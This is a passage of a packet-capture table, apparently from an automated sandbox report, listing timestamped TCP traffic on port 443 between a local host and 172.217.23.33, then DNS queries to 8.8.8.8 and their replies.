Apr 15, 2021 14:03:48.881489992 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.881541967 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.881562948 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.884577036 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.884596109 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.884650946 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.884666920 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.887749910 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.887769938 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.887830973 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.887850046 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.891469955 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.891490936 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.891549110 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.891566992 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.893946886 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.893965960 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.894023895 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.894038916 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.896811008 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.896835089 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.896909952 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.896928072 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.899534941 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.899559975 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.899627924 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.902324915 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.902348042 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.902396917 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.902439117 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.905139923 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.905163050 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.905225992 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.905249119 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.907919884 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.907943964 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.907994032 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.908011913 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.910749912 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.910773993 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.910823107 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.910840988 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.915019989 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.915045977 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.915100098 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.915117979 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.916016102 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.916043997 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.916085005 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.916100025 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.918004990 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.918026924 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.918092012 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.919933081 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.919955969 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.920015097 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.920046091 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.921936035 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.921957970 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.922014952 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.922034979 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.923845053 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.923868895 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.923923016 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.923949003 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.925838947 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.925864935 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.925919056 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.925936937 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.927757978 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.927781105 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.927838087 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.927855968 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.929685116 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.929702997 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.929771900 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.931638956 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.931660891 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.931734085 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.933621883 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.933644056 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.933737040 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.935574055 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.935596943 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.935658932 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.937583923 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.937614918 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.937695980 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.939661980 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.939692974 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.939765930 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.941447973 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.941478968 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.941556931 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.943424940 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.943463087 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.943542957 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.945350885 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.945420980 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.945471048 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.945513964 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.947276115 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.947309971 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.947411060 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.949152946 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.949182034 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.949238062 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.949268103 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.950959921 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.951003075 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.951050997 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.951066017 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.952701092 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.952744961 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.952785969 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.952801943 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.954416037 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.954456091 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.954530001 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.956041098 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.956087112 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.956152916 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.956181049 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.957731962 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.957770109 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.957837105 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.959332943 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.959378958 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.959444046 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.960920095 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.960959911 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.961018085 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.962512016 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.962553024 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.962614059 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.963490009 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.963535070 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.963587999 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.963619947 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.964535952 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.964586020 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.964643002 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.965481997 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.965523005 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.965575933 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.965605021 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.966561079 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.966603041 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.966686010 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.967502117 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.967595100 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.967595100 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.967961073 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.968390942 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.968431950 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.968477011 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.968506098 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.969343901 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.969405890 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.969475031 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.969507933 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.970331907 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.970375061 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.970447063 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.971245050 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.971282959 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.971309900 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.971344948 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.972138882 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.972335100 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.972374916 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.972404957 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.973031044 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.973068953 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.973119020 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.973134995 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.973946095 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.973992109 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.974076986 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.974816084 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.974852085 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.974956036 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.975745916 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.975783110 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.975878000 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.976591110 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.976629972 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.976671934 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.976703882 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.977463961 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.977503061 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.977577925 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.978338957 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.978379011 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.978454113 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.979195118 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.979235888 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.979326963 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.980052948 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.980099916 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.980144024 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.980180025 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.980910063 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.980958939 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.981045008 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.981736898 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.981772900 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.981827021 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.981853008 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.982548952 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.982582092 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.982656002 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.983393908 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.983429909 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.983500004 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.984240055 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.984276056 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.984345913 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.984375954 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.985048056 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.985084057 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.985181093 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.985946894 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.985985041 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.986053944 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.986644983 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.986679077 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.986751080 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.987407923 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.987452984 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.987574100 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.988195896 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.988229990 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.988280058 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.988311052 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.988986969 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.989022017 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.989082098 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.989098072 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.989734888 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.989774942 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.989859104 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.990518093 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.990557909 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.990623951 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.991266012 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.991297007 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.991364956 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.992057085 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.992094040 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.992156982 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.992180109 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.992810011 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.992841005 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.992912054 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.993587971 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.993618965 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.993658066 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.993695974 CEST	49712	443	192.168.2.7	172.217.23.33
Apr 15, 2021 14:03:48.994316101 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.994343996 CEST	443	49712	172.217.23.33	192.168.2.7
Apr 15, 2021 14:03:48.994417906 CEST	49712	443	192.168.2.7	172.217.23.33

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 15, 2021 14:02:58.001298904 CEST	60501	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:02:58.028203964 CEST	53775	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:02:58.058664083 CEST	53	60501	8.8.8.8	192.168.2.7
Apr 15, 2021 14:02:58.078428984 CEST	53	53775	8.8.8.8	192.168.2.7
Apr 15, 2021 14:02:58.918658972 CEST	51837	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:02:58.971151114 CEST	53	51837	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:01.249994040 CEST	55411	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:01.313597918 CEST	53	55411	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:02.082735062 CEST	63668	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:02.132936001 CEST	53	63668	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:25.237613916 CEST	54640	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:25.297434092 CEST	53	54640	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:34.548943043 CEST	58739	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:34.601429939 CEST	53	58739	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:35.794125080 CEST	60338	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:35.847773075 CEST	53	60338	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:46.109419107 CEST	58717	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:46.161365986 CEST	53	58717	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:47.373816967 CEST	59762	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:47.439893961 CEST	53	59762	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:47.792176008 CEST	54329	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:47.840761900 CEST	53	54329	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:48.000417948 CEST	58052	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:48.065246105 CEST	53	58052	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:49.373032093 CEST	54008	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:49.422008991 CEST	53	54008	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:50.169035912 CEST	59451	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:50.217751026 CEST	53	59451	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:51.300374031 CEST	52914	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:51.352650881 CEST	53	52914	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:51.501138926 CEST	64569	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:51.553962946 CEST	53	64569	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:53.317539930 CEST	52816	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:53.366446018 CEST	53	52816	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:53.370409966 CEST	50781	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:53.431273937 CEST	53	50781	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:53.534626007 CEST	54230	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:53.591490030 CEST	53	54230	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:53.930619955 CEST	54911	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:53.995644093 CEST	53	54911	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:54.716515064 CEST	49958	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:54.765275955 CEST	53	49958	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:55.815452099 CEST	50860	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:55.864136934 CEST	53	50860	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:57.120651960 CEST	50452	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:57.171350956 CEST	53	50452	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:58.016098022 CEST	59730	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:58.064745903 CEST	53	59730	8.8.8.8	192.168.2.7
Apr 15, 2021 14:03:59.269495964 CEST	59310	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:03:59.318136930 CEST	53	59310	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:03.113909960 CEST	51919	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:03.165693998 CEST	53	51919	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:03.949346066 CEST	64296	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:03.998048067 CEST	53	64296	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:04.109407902 CEST	56680	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:04.170857906 CEST	53	56680	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:07.334784985 CEST	58820	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:07.383415937 CEST	53	58820	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:09.763413906 CEST	60983	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:09.829746008 CEST	53	60983	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:37.423278093 CEST	49247	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:37.480350971 CEST	53	49247	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:38.373917103 CEST	52286	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:38.422718048 CEST	53	52286	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:39.550192118 CEST	56064	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:39.601758957 CEST	53	56064	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:40.353152037 CEST	63744	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:40.401917934 CEST	53	63744	8.8.8.8	192.168.2.7
Apr 15, 2021 14:04:43.477310896 CEST	61457	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:04:43.536140919 CEST	53	61457	8.8.8.8	192.168.2.7
